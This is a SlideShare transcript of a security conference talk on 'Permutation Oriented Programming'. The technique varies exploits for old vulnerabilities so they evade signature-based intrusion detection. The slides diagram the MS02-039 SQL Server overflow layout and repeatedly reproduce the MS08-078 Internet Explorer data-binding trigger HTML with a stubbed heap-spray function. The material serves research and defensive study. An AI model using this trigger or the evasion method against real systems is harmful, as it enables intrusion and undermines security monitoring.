SlideShare a Scribd company logo

"ENG++: Permutation Oriented Programming" por Nelson Brito

SegInfo , profile picture
SegInfo

- Permutation Oriented Programming (POP) is a technique that aims to circumvent pattern-matching security solutions by analyzing vulnerabilities in depth to find alternatives and variants, intending to change the behavior of exploit developers and provide unpredictable payloads through randomness. - POP focuses on manipulating the vulnerable ecosystem and memory rather than shellcode execution, aiming to exploit older vulnerabilities even when only mitigated instead of patched. - By generating diverse variants, POP treats old exploits as new vulnerabilities not matched by signatures according to pattern-matching approaches.

Technology
1 of 128
Downloaded 39 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
"ENG++: Permutation Oriented Programming" por Nelson Brito
Agenda • 0000 – Once upon a time… • 0100 – Advanced • 0001 – Introduction • 0101 – Demonstration • 0010 – Brain at work • 0110 – Conclusions • 0011 – Approach • 0111 – Questions and Answers
nbrito@pitbull:~$ whoami • Nelson Brito: • Computer/Network Security Researcher Enthusiast • Spare-time Security Researcher • Addict for systems’ (in)security • sekure SDI • Home town: • Rio de Janeiro • Public tools: • T50: an Experimental Mixed Packet Injector • Permutation Oriented Programming • ENG++ SQL Fingerprint™ • WEB: • http://about.me/nbrito
"ENG++: Permutation Oriented Programming" por Nelson Brito
Once upon a time…
"ENG++: Permutation Oriented Programming" por Nelson Brito
Before starting 0-Day Pattern-matching • 0-day is cool, isn’t it? But only if nobody is aware of its • This technology is as need today as it was in the past, existence. but the security solution cannot rely only on this. • Once the unknown vulnerability becomes known, the • No matter how fast is the pattern-matching 0-day will expire – since a patch or a mitigation is algorithm, if a pattern does not match, it means that released (which comes first). there is no vulnerability exploitation. • So we can conclude that, once expired (patched or • No vulnerability exploitation, no protection action… mitigated), 0-day has no more value. If you do not But what if the pattern is wrong? believe me, you can try to sell a well-known vulnerability to your vulnerability-broker. • How can we guarantee that the pattern, which did not match, is the correct approach for a protection • Some security solutions fight against 0-day faster action? Was the detection really designed to detect than the affected vendor. the vulnerability?
Some concepts Exploitation Vulnerability • There are lots of good papers and books describing • Any vulnerability has a trigger, which leads the the exploitation techniques. Thus, I do recommend vulnerability to a possible and reasonable exploitation. you to look for them for a better understanding. • For some weakness types the vulnerability allows to • This lecture has no pretension of being a complete control the flow of software’s execution, executing reference for this topic. an arbitrary code (shellcode), such as: CWE-119, CWE- 120, CWV-134, CWE-190, CWE-196, CWE-367, etc. • The exploitation path described here is something that I decided to follow, and it helped me to • Before executing a shellcode, the exploitation must understand and apply POP (f.k.a. ENG++) to the deal with the vulnerable ecosystem (trigger, return vulnerabilities. address, etc…), performing memory manipulation on additional entities (such as: offset, register, • All the definitions are in compliance with: JUMP/CALL, stack, heap, memory alignment, memory padding, etc). – Common Vulnerabilities and Exposures. – Common Vulnerability Scoring System. – Common Weakness Enumeration.
Current evasion techniques (a.k.a. TT) Techniques Tools • Packet fragmentation • Fragroute / Fragrouter / Sniffjoke • Stream segmentation • ADMutate / ALPHA[2-3] / BETA3 / Others • Byte and traffic insertion • Whisker / Nikto / Sandcat • Polymorphic shellcode • Snot / Stick / IDS-wakeup / Others • Denial of Service • Sidestep / RPC-evade-poc.pl / Others • URL obfuscation (+ SSL encryption) • Predator (AET) • RPC fragmentation • Etc… • HTML and JavaScript obfuscation • Etc…
What is Permutation Oriented Programming? The scenario The technique • Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected • This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Harder: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem). • People’s hope, consequently their security strategy, resides on this security model: vulnerability mitigated, • Permutation Oriented Programming: no patch… – Deep analysis of a vulnerability, (re)searching for alternatives. • But what if an old and well-known vulnerability could – Use all the acquired knowledge and alternatives be exploited, even on this security approach model? to offer a variety of decision points (variants). – Intended to change the behavior of exploit • According to pattern-matching, any new variant of an developers. old vulnerability exploitation is considered a new – Use randomness to provide unpredictable vulnerability, because there is no pattern to be payloads, i.e., permutation. matched yet!
What is Permutation Oriented Programming? The scenario The technique • Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected • This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Harder: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem). • People’s hope, consequently their security strategy, resides on this security model: vulnerability mitigated, • Permutation Oriented Programming: no patch… – Deep analysis of a vulnerability, (re)searching for alternatives. • But what if an old and well-known vulnerability could – Use all the acquired knowledge and alternatives be exploited, even on this security approach model? to offer a variety of decision points (variants). – Intended to change the behavior of exploit • According to pattern-matching, any new variant of an developers. old vulnerability exploitation is considered a new – Use randomness to provide unpredictable vulnerability, because there is no pattern to be payloads, i.e., permutation. matched yet!
What is Permutation Oriented Programming? The scenario The technique • Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected • This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Easier: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem). • People’s hope, consequently their security strategy, resides on this security model: vulnerability mitigated, • Permutation Oriented Programming: no patch… – Deep analysis of a vulnerability, (re)searching for alternatives. • But what if an old and well-known vulnerability could – Use all the acquired knowledge and alternatives be exploited, even on this security approach model? to offer a variety of decision points (variants). – Intended to change the behavior of exploit • According to pattern-matching, any new variant of an developers. old vulnerability exploitation is considered a new – Use randomness to provide unpredictable vulnerability, because there is no pattern to be payloads, i.e., permutation. matched yet!
POP (pronounced /pŏp/) technique The truth The examples • POP technique deals with vulnerable ecosystem and • Server-side vulnerabilities: memory manipulation, rather than shellcode – it is – MS02-039: CVE-2002-0649/CWE-120. neither a new polymorphic shellcode technique, nor – MS02-056: CVE-2002-1123/CWE-120. an obfuscation technique. • Client-side vulnerabilities: • POP technique can be applied to work with Rapid7 Metasploit Framework, CORE Impact Pro, Immunity – MS08-078: CVE-2008-4844/CWE-367. CANVAS Professional, and regular stand-alone – MS09-002: CVE-2009-0075/CWE-367. proof-of-concepts (freestyle coding). • Windows 32-bit shellcodes: • POP technique is neither an additional entropy for – 波動拳: “CMD /k”. tools mentioned above, nor an Advanced Evasion – 昇龍拳: “CMD /k set DIRCMD=/b”. Technique (AET). Instead, POP technique can empower both of them. • All example modules were ported to work with Rapid7 Metasploit Framework, but there are also • POP technique maintains the exploitation reliability, examples for client-side in HTML and JavaScript. even using random decisions, it is able to achieve all exploitation requirements.
What if… exploit #1
What if… exploit #1 exploit #2
What if… exploit #1 exploit #N exploit #2
What if… exploit #1 exploit #N exploit #2 shared zone
What if… exploit #1 exploit #N exploit #2 shared zone
What if… exploit #1 exploit #N exploit #2 shared zone Permutation Oriented Programming
"ENG++: Permutation Oriented Programming" por Nelson Brito
Vulnerabilities MS02-039 MS08-078 • Common Vulnerabilities and Exposures: • Common Vulnerabilities and Exposures: – CVE-2002-0649. – CVE-2008-4844. • Common Weakness Enumeration: • Common Weakness Enumeration: – CWE-120. – CWE-367. • CVSS Severity: 7.5 (HIGH). • CVSS Severity: 9.3 (HIGH). • Target: • Target: – Microsoft SQL Server 2000 SP0-2. – Microsoft Internet Explorer 5.01 SP4, 6 SP0-1, 7 and 8 Beta 2. • Vulnerable ecosystem: – Protocol UDP. • Vulnerable ecosystem: – Communication Port 1434. – DHTML with embedded Data binding. – SQL Request CLNT_UCAST_INST. – XML Data Source Object (DSO). – INSTANCENAME >= 96 bytes. – Data Consumer (HTML element) pointing to a – INSTANCENAME != NULL. dereferenced XML DSO.
"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability 0x04 request memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump address padding additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address jump padding writable address Trigger additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address jump padding writable address Permutation additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding Exploitation overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito
<XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer (Data Consumers) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::CRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CCurrentRecordConsumer::Bind DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CCurrentRecordInstance::GetCurrentRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::CreateBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::AddBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CImplPtrAry::Append DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CRecordInstance::CRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CCurrentRecordConsumer::Bind DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CCurrentRecordInstance::GetCurrentRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CXfer::CreateBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CRecordInstance::AddBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CImplPtrAry::Append DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::TransferToDestination DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
